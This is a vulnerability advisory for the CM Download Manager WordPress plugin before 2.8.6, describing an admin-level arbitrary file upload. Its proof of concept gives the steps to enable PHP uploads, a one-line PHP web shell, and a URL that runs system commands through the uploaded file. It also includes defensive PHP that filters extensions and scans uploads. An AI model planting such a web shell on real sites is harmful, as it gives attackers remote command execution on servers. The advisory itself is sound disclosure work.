WordPress Plugin Vulnerabilities

CM Download Manager < 2.8.6 - Admin+ Arbitrary File Upload

Description

The plugin allows high-privilege users such as admins to upload arbitrary files by adding any extension to the plugin's "Allowed file extensions" setting, which admins of a multisite blog could use to upload PHP files, for example.

Proof of Concept

##########################
Activate PHP extension:
##########################

- Log in and go to "CM Downloads" > "Settings" > "General".

- Now you can simply add the php extension to the "Allowed file extensions:" field, because the plugin does not reject the php extension.
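
As an added example (not the plugin's code), the following PHP shows how a plugin can keep an admin-editable extension list from ever enabling PHP uploads: the saved setting is filtered against a server-side deny-list, and every extension in an uploaded filename is checked, not only the last one. The function names, the deny-list and the sample setting are assumptions; the weak setting mirrors the scenario above and the filtered result is the corrected allow-list.

```php
<?php
// Added example, not the plugin's code. Function names, the deny-list and the
// sample setting below are assumptions made for illustration.

// Extensions that must never be accepted regardless of the admin setting,
// because the web server may execute them. Extend to match your server config.
const CMDM_EXAMPLE_DENIED_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phps', 'phar', 'pht', 'htaccess',
];

/**
 * Normalise the comma-separated "Allowed file extensions" setting into a clean
 * allow-list: lower-case, leading dots and whitespace stripped, odd characters
 * ignored, and anything on the deny-list dropped even if the admin typed it.
 */
function cmdm_example_sanitize_allowed_extensions(string $setting): array
{
    $clean = [];
    foreach (explode(',', $setting) as $ext) {
        $ext = strtolower(trim($ext, " \t\n\r\0\x0B."));
        if ($ext === '' || !preg_match('/^[a-z0-9]+$/', $ext)) {
            continue; // empty entry or unexpected characters
        }
        if (in_array($ext, CMDM_EXAMPLE_DENIED_EXTENSIONS, true)) {
            continue; // executable extension: never allowed
        }
        $clean[$ext] = true;
    }
    return array_keys($clean);
}

/**
 * Decide whether an uploaded filename is acceptable. Every extension in the
 * name is checked against the deny-list (so "shell.php.zip" is rejected, since
 * some server configurations act on inner extensions), and the last extension
 * must be on the sanitised allow-list.
 */
function cmdm_example_is_upload_allowed(string $filename, array $allowed): bool
{
    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2) {
        return false; // no extension at all
    }
    array_shift($parts); // drop the name portion, keep every extension
    foreach ($parts as $ext) {
        if (in_array($ext, CMDM_EXAMPLE_DENIED_EXTENSIONS, true)) {
            return false;
        }
    }
    return in_array(end($parts), $allowed, true);
}

// Weak setting an admin could save (the report's scenario)...
$weak_setting = 'pdf, zip, .PHP, phtml';
$allowed = cmdm_example_sanitize_allowed_extensions($weak_setting);
// ...which the deny-list reduces to the corrected allow-list ['pdf', 'zip'].
assert($allowed === ['pdf', 'zip']);

// Constructed filenames and the expected decision for each.
$checks = [
    'report.pdf'                   => true,
    '1660921772_malicious_php.php' => false, // denied extension
    'archive.zip'                  => true,
    'shell.php.zip'                => false, // denied extension inside the name
    'notes.PDF'                    => true,  // comparison is case-insensitive
    'noextension'                  => false,
];
foreach ($checks as $name => $expected) {
    $result = cmdm_example_is_upload_allowed($name, $allowed);
    printf("%-30s %s\n", $name, $result ? 'allowed' : 'rejected');
    assert($result === $expected);
}
```

The point of filtering at save time and at upload time is that the setting is data under an admin's control, while the deny-list is code: no value an admin can enter through the settings page is able to turn the uploads directory into a place PHP runs from. Serving the uploads directory with script execution disabled is the complementary server-side control.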

##################################
Upload our malicious PHP file:
##################################

- Go to "CM Downloads" > "Add New".

- Upload our malicious file:

	For example: malicious_php.php containing
	<?=`$_GET[cmd]`?>

##########################
Find the right path:
##########################

There are two ways to find the stored filename, because the upload code looks like:

   $name = time() . '_' . sanitize_file_name($_download_file['name']);

But we don't need to write a script; the name can be read directly from the plugin's UI:

- Go to "CM Downloads" > "CM Downloads".
- Click on "Edit" next to the name we gave our Download; we are redirected to the edit page.
- Note the id in the URL, e.g. http://target/cmdownload/edit/id/7/ => so here it is 7.
- The name of our malicious file is shown below the "Browse" button: 1660921772_malicious_php.php
- So now we can execute system commands via the upload path:

 => target/wp-content/uploads/cmdm/id/filename

 https://target/wp-content/uploads/cmdm/7/1660921772_malicious_php.php?cmd=command
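
An added example for defenders (not the plugin's code): a PHP triage helper that walks the wp-content/uploads/cmdm/<id>/<time()>_<name> layout described above and reports every file carrying an executable extension, together with the download id and the upload time decoded from the path so each finding can be matched against the "CM Downloads" list and the web server logs. The function names and the extension list are assumptions, and the sample file list is constructed; on a real site, feed the function the generator at the bottom pointed at the cmdm directory.

```php
<?php
// Added example, not the plugin's code. Triage helper for the upload layout the
// report describes: wp-content/uploads/cmdm/<download id>/<time()>_<original name>.
// Function names and the extension list are assumptions; the sample paths are constructed.

// Extensions a web server may execute; extend to match your server configuration.
const CMDM_EXAMPLE_EXECUTABLE_EXTENSIONS = [
    'php', 'php3', 'php4', 'php5', 'php7', 'php8', 'phtml', 'phps', 'phar', 'pht', 'htaccess',
];

/**
 * Given paths relative to the cmdm directory, return entries worth reviewing:
 * any executable extension anywhere in the name (so "x.php.zip" is caught too),
 * plus the download id and upload time decoded from the path. Paths that do
 * not follow the expected layout are reported as well, since the plugin did
 * not write them.
 */
function cmdm_example_find_suspicious_uploads(iterable $relative_paths): array
{
    $findings = [];
    foreach ($relative_paths as $path) {
        $path = str_replace('\\', '/', $path);
        if (!preg_match('~^(\d+)/(\d+)_(.+)$~', $path, $m)) {
            $findings[] = ['path' => $path, 'reason' => 'unexpected layout'];
            continue;
        }
        [, $id, $timestamp, $name] = $m;
        $exts = array_slice(explode('.', strtolower($name)), 1);
        $hits = array_values(array_intersect($exts, CMDM_EXAMPLE_EXECUTABLE_EXTENSIONS));
        if ($hits === []) {
            continue;
        }
        $findings[] = [
            'path'        => $path,
            'download_id' => (int) $id,
            'uploaded_at' => gmdate('Y-m-d H:i:s', (int) $timestamp) . ' UTC',
            'reason'      => 'executable extension: ' . implode(',', $hits),
        ];
    }
    return $findings;
}

/** Yield paths relative to $cmdm_dir on a real site, e.g. /var/www/html/wp-content/uploads/cmdm. */
function cmdm_example_list_uploads(string $cmdm_dir): Generator
{
    $cmdm_dir = rtrim($cmdm_dir, '/');
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($cmdm_dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $file) {
        yield substr($file->getPathname(), strlen($cmdm_dir) + 1);
    }
}

// Constructed sample listing; the first entry is the file name from the report.
$sample = [
    '7/1660921772_malicious_php.php',
    '7/1660921800_brochure.pdf',
    '12/1661000000_archive.php.zip',
    '3/1659999999_notes.txt',
    'stray.php',
];
foreach (cmdm_example_find_suspicious_uploads($sample) as $finding) {
    echo json_encode($finding), PHP_EOL; // three findings: two executable extensions, one odd path
}
// Live site: cmdm_example_find_suspicious_uploads(cmdm_example_list_uploads('/path/to/wp-content/uploads/cmdm'));
```

Because the filename keeps the time() prefix, the decoded upload time gives a window to search in the access log for the first request to that path with a query string, which is how use of such a file would show up after the fact.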

Affects Plugins

CM Download Manager: fixed in 2.8.6

Miscellaneous

Original Researcher: Mika
Submitter: Mika
Verified: Yes

Timeline

Publicly Published: 2022-09-05
Added: 2022-09-05
Last Updated: 2022-09-05
